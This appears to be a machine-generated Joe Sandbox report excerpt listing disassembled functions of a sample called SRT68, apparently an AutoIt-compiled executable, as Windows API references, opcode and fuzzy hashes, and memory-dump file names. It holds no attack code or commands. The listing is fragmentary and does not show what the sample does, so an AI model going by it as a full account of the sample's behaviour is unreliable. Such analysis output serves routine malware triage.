                                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction Fuzzy Hash: E162FB30A146189BEB24CFA4C890BDEB776FF58300F1091A9E10DEB2D4E7759E81CB59
                                                                      APIs
                                                                        • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
                                                                      • _free.LIBCMT ref: 010096A2
                                                                      • _free.LIBCMT ref: 010096A9
                                                                      • _free.LIBCMT ref: 01009714
                                                                        • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                        • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                      • _free.LIBCMT ref: 0100971C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                      • String ID:
                                                                      • API String ID: 1552873950-0
                                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction ID: 81018b8c6aff4d2efa09c3ff0c439bfa93803e65ba7d91d22b64dfd6b411023b
                                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction Fuzzy Hash: 56513FB1D04259AFDF259F64CC81A9EBBB9FF88304F00449EB64DA3251DB755A80CF58
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction ID: 11fd8b5aa7f8a886f5900c817a044762034048a9e69d102e5f2cec970892d405
                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction Fuzzy Hash: 0241B575E007479BDB188EA9CAA2FAE77A5AF81370B24813DE815C7680D774ED41AB40
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FDEA39
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00FDEA83
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                        • Part of subcall function 00FC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                      • String ID: X
                                                                      • API String ID: 3777226403-3081909835
                                                                      • Opcode ID: 268b8a51f011bc96f54aaca981ceefb596197797a2cc965ea70d59d3eae12e97
                                                                      • Instruction ID: f9d574cf4cb93988fe952b648e87f920816c3e3352cb9c463741e04d84b90991
                                                                      • Opcode Fuzzy Hash: 268b8a51f011bc96f54aaca981ceefb596197797a2cc965ea70d59d3eae12e97
                                                                      • Instruction Fuzzy Hash: 3C21C671A002499BCB519F94CC45BEE7BFDAF49314F04805AE848AB241DBB859899FA1
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 010098F8
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0100990F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                      • Instruction ID: 5eeb89e10f9ea7337118097439f4a057dea7a0df6f50fc3a3ed36be0497acabb
                                                                      • Opcode Fuzzy Hash: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                      • Instruction Fuzzy Hash: 90D05E7954030EABDB709EA0EC0EFAA773CE705700F1042A1FE94D5191EAB695988BA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                      • Instruction ID: 304708f059a1a4b31da32ca0164478eb317e6fada54abb4ce8adf86e11ecfe85
                                                                      • Opcode Fuzzy Hash: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                      • Instruction Fuzzy Hash: AEF168706083019FDB14DF28C980A6EBBE5FF89314F54896EF8999B251D778E905CF82
                                                                      APIs
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                        • Part of subcall function 00FB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FAF930), ref: 00FB6154
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FAF9CD
                                                                      • OleInitialize.OLE32(00000000), ref: 00FAFA4A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE45C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 1986988660-0
                                                                      • Opcode ID: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                      • Instruction ID: ed26bc26b7e6eb4b977ccc7c96886c3d9bc7f166b82bbb09198ffee63789b12a
                                                                      • Opcode Fuzzy Hash: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                      • Instruction Fuzzy Hash: DD81D1B0A01250CFC3A4DF39EC556597BE9FB9938AB5081AAD0D8CB369EB7E4404CF10
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FA4370
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA4432
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$_memset
                                                                      • String ID:
                                                                      • API String ID: 1505330794-0
                                                                      • Opcode ID: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                      • Instruction ID: 6ce78b3c165a062d9dd6f3399d4366eae951f5391e3aaa8a60b2b2cc01c68b84
                                                                      • Opcode Fuzzy Hash: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                      • Instruction Fuzzy Hash: 053181B09047028FD731DF24D88469BBBF8FB9A358F00092EF5DA86241D7B5B944DB52
                                                                      APIs
                                                                      • __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                        • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA192
                                                                        • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA19C
                                                                      • __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                        • Part of subcall function 00FCA1C8: GetModuleFileNameW.KERNEL32(00000000,010633BA,00000104,?,00000001,00000000), ref: 00FCA25A
                                                                        • Part of subcall function 00FCA1C8: ___crtMessageBoxW.LIBCMT ref: 00FCA308
                                                                        • Part of subcall function 00FC309F: ___crtCorExitProcess.LIBCMT ref: 00FC30A5
                                                                        • Part of subcall function 00FC309F: ExitProcess.KERNEL32 ref: 00FC30AE
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      • RtlAllocateHeap.NTDLL(01570000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1372826849-0
                                                                      • Opcode ID: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                      • Instruction ID: d40958edd2aec18157dce7269f34f228146a7dead5a38277c1024339c972e226
                                                                      • Opcode Fuzzy Hash: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                      • Instruction Fuzzy Hash: 6D01D632640B1BDAD6202774AE43F6D77489F82BB1F50002DF4059A181DF79ACC17760
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01009548,?,?,?,?,?,00000004), ref: 010098BB
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010098D1
                                                                      • CloseHandle.KERNEL32(00000000,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010098D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                      • Instruction ID: 60e5907c9387a4bb4a90c29552d641cbefa086cb1084a3f2fd138cd001ecc254
                                                                      • Opcode Fuzzy Hash: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                      • Instruction Fuzzy Hash: E4E08632141215B7E7311E54EC0AFCA7F69AB067A4F308210FB94690D087B616119798
                                                                      APIs
                                                                      • _free.LIBCMT ref: 01008D1B
                                                                        • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                        • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                      • _free.LIBCMT ref: 01008D2C
                                                                      • _free.LIBCMT ref: 01008D3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction ID: 2cfa348369af864702244ffb73a78d48128ab9bb1ba841def208706520f4fcfa
                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction Fuzzy Hash: 3BE0C2E1E0160243EBA1B5BCAE41F8333DC9F68352B044A6FB94ED7182CE68F4429028
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CALL
                                                                      • API String ID: 0-4196123274
                                                                      • Opcode ID: e04a3e679acdadab78db17339a09d1be81f36e9007c6f198ceba750df0f92f86
                                                                      • Instruction ID: 1f21a54c65406773310ab65b23f38170250882b497d18f388218d41ad6bab436
                                                                      • Opcode Fuzzy Hash: e04a3e679acdadab78db17339a09d1be81f36e9007c6f198ceba750df0f92f86
                                                                      • Instruction Fuzzy Hash: 78227FB1908301DFD724DF14C450B6AB7E1BF86314F14896DE89A8B362DB35ED45EB82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 4104443479-3962188686
                                                                      • Opcode ID: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                      • Instruction ID: f53476245f069f45f9735579002b07dedabf9b3537c62e712c71414d7ba3b6c0
                                                                      • Opcode Fuzzy Hash: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                      • Instruction Fuzzy Hash: 37417FF2E041586BDF219B54CC917BE7BA29BC7310F284475FC86DB282D6A47D44B3A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                                      • Instruction ID: a7ba441c8ec6ded86e2699d219c325bd4a7550b04b810b10d5774df20398e37c
                                                                      • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                                      • Instruction Fuzzy Hash: 803173F2604606AFC704EF68CCD1E69B3A9FF493207158629E519CB291EB34E951DB90
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00FA4834
                                                                        • Part of subcall function 00FC336C: __lock.LIBCMT ref: 00FC3372
                                                                        • Part of subcall function 00FC336C: DecodePointer.KERNEL32(00000001,?,00FA4849,00FF7C74), ref: 00FC337E
                                                                        • Part of subcall function 00FC336C: EncodePointer.KERNEL32(?,?,00FA4849,00FF7C74), ref: 00FC3389
                                                                        • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FA4915
                                                                        • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA492A
                                                                        • Part of subcall function 00FA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
                                                                        • Part of subcall function 00FA3B3A: IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
                                                                        • Part of subcall function 00FA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
                                                                        • Part of subcall function 00FA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA4874
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                      • String ID:
                                                                      • API String ID: 1438897964-0
                                                                      • Opcode ID: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                      • Instruction ID: 18cf250d74f3715a3646a8d9de1fa7808aa9739e8472d7a4d8e2e38422035ea5
                                                                      • Opcode Fuzzy Hash: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                      • Instruction Fuzzy Hash: FB11A5719083429FC710DF28EC0590ABFE8FF8A790F10451EF08083271DBBA9645DB91
                                                                      APIs
                                                                        • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                        • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                        • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(01570000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                      • std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                      • __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                        • Part of subcall function 00FC859B: RaiseException.KERNEL32(?,?,?,01059E78,00000000,?,?,?,?,00FC0E06,?,01059E78,?,00000001), ref: 00FC85F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3902256705-0
                                                                      • Opcode ID: 45ca90016b4ce25f409079b6dd34be3fe59317ecc54e6e2f3b4d22c9903bf903
                                                                      • Instruction ID: 1ee8e6ef9339d48caede660fc5b685308583c15109273ba408d74782d6a97ac0
                                                                      • Opcode Fuzzy Hash: 45ca90016b4ce25f409079b6dd34be3fe59317ecc54e6e2f3b4d22c9903bf903
                                                                      • Instruction Fuzzy Hash: E6F0813190031BA6CB18BA94EE07FDF77AC9F01361F10442EF909A6141DF749A82A6D1
                                                                      APIs
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      • __lock_file.LIBCMT ref: 00FC53EB
                                                                        • Part of subcall function 00FC6C11: __lock.LIBCMT ref: 00FC6C34
                                                                      • __fclose_nolock.LIBCMT ref: 00FC53F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
